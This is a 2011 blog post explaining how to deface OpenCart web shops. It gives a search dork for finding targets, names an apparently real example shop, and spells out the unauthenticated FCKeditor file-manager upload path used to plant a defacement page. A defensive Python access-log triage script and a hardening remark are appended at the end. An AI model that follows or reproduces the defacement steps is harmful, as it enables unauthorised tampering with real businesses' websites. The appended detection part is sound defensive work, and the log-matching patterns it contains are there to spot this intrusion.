Sunday, 10 July 2011

Deface with Powered by Open Cart

Remote File Upload Opencart (deface)


dork : Powered By OpenCart site:com

The "site:" value can be anything, as long as the site runs OpenCart.

ex target: http://www.harleypartsintl.com/

It also works with a target at www.target.com/patch/, if you find a target whose shop lives under /patch/.
ex: http://www.target.com/patch/

Once you have a target, go straight to injecting the exploit.

for exploit :

    admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


So it ends up like this:
ex: http://www.harleypartsintl.com/admin/vie.../test.html

If the target lives under /patch/, append the path after /patch/:
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Look at the page that comes up; it contains the file upload form.
For the connector, choose PHP.
Then upload our deface HTML file.
If it succeeds, an alert like this appears:

Code:
"file uploaded with no errors"

Check whether our file has been uploaded by clicking "Get Folders and Files".

Now look at the result:

ex result: http://www.harleypartsintl.com/h-n.html

Unfortunately, the file we upload cannot overwrite an existing file; it is saved as a duplicate instead: file(1).html or file(2).html.
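
Seen from the shop owner's side, the steps above leave a recognisable trail in the web server access log: requests under the FCKeditor connectors directory, followed by fetches of new or duplicate-named HTML files. The triage script below is an added example, not part of the original post; it assumes the combined access log format, and the log lines, IP addresses and the `EXAMPLE-CONNECTOR` name are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path fragment from the post; the file manager connectors live under it.
CONNECTOR_FRAGMENT = "/fckeditor/editor/filemanager/connectors/"
# Duplicate naming described in the post: file(1).html, file(2).html
DUPLICATE_NAME = re.compile(r"\(\d+\)\.html?$", re.IGNORECASE)
# Assumption: Apache/nginx "combined" access log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def triage(lines):
    """Return {client_ip: [(timestamp, reason, method, path, status), ...]}."""
    touched = set()  # clients that have requested anything under the connectors
    findings = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, method, status = m["ip"], m["method"], int(m["status"])
        path = unquote(m["path"].split("?", 1)[0])  # drop query, decode %28 etc.
        if CONNECTOR_FRAGMENT in path.lower():
            touched.add(ip)
            reason = "connector-post" if method == "POST" else "connector-access"
        elif status == 200 and DUPLICATE_NAME.search(path):
            reason = "duplicate-named-html"
        elif status == 200 and ip in touched and path.lower().endswith((".html", ".htm")):
            reason = "html-fetch-after-connector"
        else:
            continue
        findings[ip].append((m["ts"], reason, method, path, status))
    return dict(findings)

# Constructed sample log: documentation IPs, placeholder connector name.
BASE = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/"
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Jul/2011:09:14:02 +0700] "GET {BASE}test.html HTTP/1.1" 200 5120 "-" "-"',
    f'203.0.113.7 - - [10/Jul/2011:09:14:40 +0700] "POST {BASE}EXAMPLE-CONNECTOR?x=1 HTTP/1.1" 200 310 "-" "-"',
    '203.0.113.7 - - [10/Jul/2011:09:15:05 +0700] "GET /page%281%29.html HTTP/1.1" 200 2048 "-" "-"',
    '203.0.113.7 - - [10/Jul/2011:09:15:30 +0700] "GET /landing.html HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.20 - - [10/Jul/2011:09:16:00 +0700] "GET /index.php?route=common/home HTTP/1.1" 200 9000 "-" "-"',
]
if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        for hit in hits:
            print(ip, *hit)
```

Any hit on the connectors path from outside the admin's own addresses is worth investigating, and the editor's `filemanager` directory should not be reachable without authentication.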
